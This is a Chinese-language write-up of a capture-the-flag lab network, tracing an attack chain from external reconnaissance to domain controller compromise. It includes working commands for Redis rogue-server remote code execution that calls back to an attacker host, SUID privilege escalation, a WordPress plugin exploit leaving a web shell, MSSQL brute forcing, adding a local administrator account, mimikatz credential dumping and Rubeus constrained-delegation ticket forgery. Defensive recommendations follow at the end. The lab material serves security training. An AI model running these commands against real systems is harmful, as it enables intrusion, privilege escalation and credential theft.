内网渗透实战：春秋云镜(3)-Brute4Road 教学文档

1. 外网打点阶段

1.1 初始信息收集

使用 fscan 进行初步扫描：

fscan version: 1.8.2
start infoscan(icmp) 
Target 39.101.188.102 is alive
[*] Icmp alive hosts len is: 1
39.101.188.102:6379 open
39.101.188.102:22 open
39.101.188.102:21 open
39.101.188.102:80 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.101.188.102 code:200 len:4833 title:Welcome to CentOS
[+] ftp://39.101.188.102:21:anonymous [->]pub

发现关键服务：

FTP匿名登录（仅有空pub文件夹）
Redis未授权访问（6379端口）

1.2 Redis未授权利用

使用Redis主从复制RCE漏洞进行攻击：

python3 redis-rogue-server.py --rhost 39.101.188.102 --rport 6379 --lhost 43.xxx.xxx.xxx --lport 6667 --exp exp.so

成功获取shell后，标准化shell环境：

python -c 'import pty;pty.spawn("/bin/bash")'

1.3 权限提升与flag01获取

发现/home/redis/flag/flag01但无权限读取，使用SUID提权：

find / -user root -perm -4000 -print 2>/dev/null

发现base64有SUID权限，利用它读取flag：

base64 '/home/redis/flag/flag01' | base64 --decode

2. 内网横向移动

2.1 内网信息收集

在VPN上搭建web服务传输工具，使用fscan扫描内网：

./fscan -h 172.22.2.1/24

扫描结果关键信息：

172.22.2.3 DC
172.22.2.7 本机
172.22.2.16 MSSQLSERVER
172.22.2.18 WordPress站点
172.22.2.34 XIAORANG\CLIENT01

2.2 建立代理通道

使用vemon建立代理通道：

proxychains wpscan --url http://172.22.2.18/

2.3 WordPress漏洞利用

利用WordPress插件漏洞(CVE-2021-25003)：

proxychains python3 WpCargo.py -t http://172.22.2.18/

生成攻击路径：

http://172.22.2.18/wp-content/wp-conf.php?1=system

使用蚁剑连接，配置代理设置。

2.4 获取flag03

在wp-config.php中找到数据库凭据，登录数据库后发现类似字典的表。

3. 域渗透阶段

3.1 MSSQL服务器攻击

使用发现的字典爆破MSSQL服务器：

fscan -h 172.22.2.16 -m mssql -pwdf pwd.txt sa ElGNkOiC

使用MDUT连接，配置全局代理(proxifer)，使用SweetPotato提权：

C:/Users/Public/sweetpotato.exe -a "net user test 123456 /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators test /add"

3.4 获取flag04

读取系统信息确认域环境，使用mimikatz获取域用户哈希。

4. 约束委派攻击

发现MSSQLSERVER配置了到DC的LDAP和CIFS服务的约束性委派。

4.1 使用Rubeus申请服务票据

Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:4250ef4c15bfeb685371970e1be00b85 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

4.2 注入票据并伪造ST

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:[票据内容]

4.3 读取域控制器flag

type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt

5. 关键工具与技术总结

fscan：多功能内网扫描工具
Redis未授权访问利用：主从复制RCE
SUID提权：利用base64的SUID权限
vemon代理：内网穿透
WordPress插件漏洞：CVE-2021-25003
SweetPotato：Windows提权工具
mimikatz：凭据提取工具
Rubeus：Kerberos票据操作工具
约束委派攻击：S4U伪造ST技术

6. 防御建议

禁用Redis的未授权访问
严格控制SUID权限
及时更新WordPress插件
配置适当的Kerberos委派策略
监控异常票据请求
实施最小权限原则
定期审计服务账户权限

通过本案例可以学习到从外网打点到内网横向移动，再到域渗透的完整攻击链，以及多种提权和权限维持技术的实战应用。

内网渗透实战：春秋云镜(3)-Brute4Road 教学文档 1. 外网打点阶段 1.1 初始信息收集使用 fscan 进行初步扫描：发现关键服务： FTP匿名登录（仅有空pub文件夹） Redis未授权访问（6379端口） 1.2 Redis未授权利用使用Redis主从复制RCE漏洞进行攻击：成功获取shell后，标准化shell环境： 1.3 权限提升与flag01获取发现/home/redis/flag/flag01但无权限读取，使用SUID提权：发现base64有SUID权限，利用它读取flag： 2. 内网横向移动 2.1 内网信息收集在VPN上搭建web服务传输工具，使用fscan扫描内网：扫描结果关键信息： 2.2 建立代理通道使用vemon建立代理通道： 2.3 WordPress漏洞利用利用WordPress插件漏洞(CVE-2021-25003)：生成攻击路径：使用蚁剑连接，配置代理设置。 2.4 获取flag03 在wp-config.php中找到数据库凭据，登录数据库后发现类似字典的表。 3. 域渗透阶段 3.1 MSSQL服务器攻击使用发现的字典爆破MSSQL服务器：使用MDUT连接，配置全局代理(proxifer)，使用SweetPotato提权： 3.4 获取flag04 读取系统信息确认域环境，使用mimikatz获取域用户哈希。 4. 约束委派攻击发现MSSQLSERVER配置了到DC的LDAP和CIFS服务的约束性委派。 4.1 使用Rubeus申请服务票据 4.2 注入票据并伪造ST 4.3 读取域控制器flag 5. 关键工具与技术总结 fscan ：多功能内网扫描工具 Redis未授权访问利用：主从复制RCE SUID提权：利用base64的SUID权限 vemon代理：内网穿透 WordPress插件漏洞：CVE-2021-25003 SweetPotato ：Windows提权工具 mimikatz ：凭据提取工具 Rubeus ：Kerberos票据操作工具约束委派攻击：S4U伪造ST技术 6. 防御建议禁用Redis的未授权访问严格控制SUID权限及时更新WordPress插件配置适当的Kerberos委派策略监控异常票据请求实施最小权限原则定期审计服务账户权限通过本案例可以学习到从外网打点到内网横向移动，再到域渗透的完整攻击链，以及多种提权和权限维持技术的实战应用。